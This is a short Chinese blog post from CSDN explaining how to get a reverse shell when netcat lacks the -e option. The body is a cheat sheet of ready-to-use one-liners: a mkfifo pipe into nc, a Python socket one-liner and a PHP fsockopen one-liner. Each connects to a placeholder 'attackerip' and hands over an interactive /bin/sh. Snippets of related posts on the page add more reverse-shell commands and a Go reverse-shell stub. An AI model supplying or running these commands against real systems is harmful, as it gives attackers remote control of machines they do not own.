nc不支持-e时的反弹

于 2023-12-28 17:28:10 发布
阅读量465 收藏 7
点赞数 9
分类专栏: 黑客帝国 文章标签: hackers
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jailman/article/details/135274665
版权

请添加图片描述

如果你想要使用nc反弹shell,但是不能使用-e选项,你可以尝试以下的替代方法:

  • 使用mkfifo或mknod命令创建一个命名管道,然后使用cat命令读取管道中的内容,并将其传递给/bin/sh执行,再将输出重定向到nc连接。 例如:
  mkfifo /tmp/f
  cat /tmp/f | /bin/sh -i 2>&1 | nc attackerip listenport > /tmp/f
  • 使用python或php脚本来执行系统命令,并将标准输入、输出、错误重定向到socket连接。例如:
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",listenport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  php -r '$sock=fsockopen("attackerip",listenport);exec("/bin/sh -i <&3 >&3 2>&3");'
大囚长
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NC反弹CMD.EXE
04-20
NC反弹CMD
netCDF4.9.2-NC4-64.exe
最新发布
03-07
netCDF4.9.2-NC4-64.exe
NC63 UAP-Studio 破解补丁
02-20
NC63 UAP-Studio 破解补丁 本补丁紧供学习,请勿非法用途
NC5.7--数据字典
03-02
NC5.7数据字典,采用帮助文件形式组织,方便查询相应表及字段的说明。
UAP-STUDIO-6.5.0.2 适用NC65产品二开工具
09-18
用友NC65产品二开的集成开发环境
[TIP]NC不使用-e选项反弹shell
weixin_34315189的博客
11-16 816
【转自】http://www.2cto.com/article/201305/209914.html 攻击方执行: 1 nc-lnvp4430 被攻击方执行: 1 2 mknod/tmp/backpipep /bin/sh0</tmp/backpipe|nc192.168.xx.xx4...
Linux反弹Shell总结
qq_45600801的博客
01-06 4191
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
图文介绍——NC使用笔记
LainWith的博客
01-20 7271
NC 简介 Netcat 简称为nc文名网猫,被誉为网络工具的瑞士军刀。具备以下功能: 侦听模式/传输模式 telnet/获取 banner信息(当作telent工具使用,甚至更好用) 传输文本信息(可以作为聊天工具) 传输文件/目录 加密传输文件 远程控制/木马(一般来说,不会被查杀) 加密所有流量 流媒体服务器 远程克隆硬盘(一般用作电子取证) nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc
php命令执行反弹nc,详解NC反弹shell的几种方法
weixin_42110533的博客
04-04 641
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
nc-netcat-win-x86.zip
06-11
nc_netcat_win_x86
NC65开发 - NC65开发文档
09-19
NC65开发文档
apache-flume-1.6.0-bin.tar,nc-1.84-22.el6.x86_64
12-24
apache-flume-1.6.0-bin.tar,nc-1.84-22.el6.x86_64 apache-flume-1.6.0-bin.tar,nc-1.84-22.el6.x86_64
HTTPS双向认证+USB硬件加密锁(加密狗)配置
热门推荐
神棍之路
09-06 22万+
环境: Ubuntu14.04,apache2.4.7, openssl1.0.1f 安装apache2 apt-get install apache2 -y 一般openssl默认已经安装 开启apache的ssl模块和ssl站点 a2enmod ssl a2ensite default-ssl.conf 创建证书目录 mkdir /etc/apache2/certs
golang写的反弹shell(自作孽不可活,切记,切记!)
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
FreeBuf爬虫
神棍之路
08-29 7万+
freebuf爬虫 #C:\Python27\python.exe #coding:utf-8 import sys reload(sys) sys.setdefaultencoding("utf-8") import re import os import urllib import requests from multiprocessing import Pool subject_d
DNSCrypt防止DNS窃听
神棍之路
09-05 7万+
间人劫持攻击已经屡见不鲜了,恶意攻击者可以窃听路由和交换机,对你目前的操作一清二楚。 除了ssl/tsl加密通信的窃听难度较高外,其他的访问地址,内容等攻击者都可以了如指掌。 DNS抓包是了解你访问地址的一个重要途径,然而DNS是基于UDP,几乎是公开透明的通信。 为了防止DNS被攻击者抓包从而获取我们的操作行为,我们可以使用dnscrypt来对DNS进行加密。 我们首先下载dnscrp
python TCP包注入
神棍之路
08-25 7万+
#! /usr/bin/env python import socket import struct def checksum(data): s = 0 n = len(data) % 2 for i in range(0, len(data)-n, 2): s+= ord(data[i]) + (ord(data[i+1]) << 8) if n
Cookie注入实战(非SQL注入)
神棍之路
11-08 7万+
cookie注入原理其实很简单,就是利用了session机制的特性,只能说是特性,不能算是漏洞。 这里简单的说下原理,session的机制就相当于你有一张蛋糕店的会员卡,这张会员卡就是你浏览器的cookie,上边有你的id号等信息,但是是否有效和有多少余额只能由店里边的柜员机决定,这个柜员机就是服务器上的session管理器,注入就好比有人偷偷的复制了你的会员卡(cookie),拿去店里消费
linux nc -e
07-27
根据这些引用内容,可以得出结论,linux nc -e命令可以用于反弹shell,具体的用法和参数可以根据不同的情况选择合适的方法。 #### 引用[.reference_title] - *1* *2* [内网渗透-常用反弹shell方法总结]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值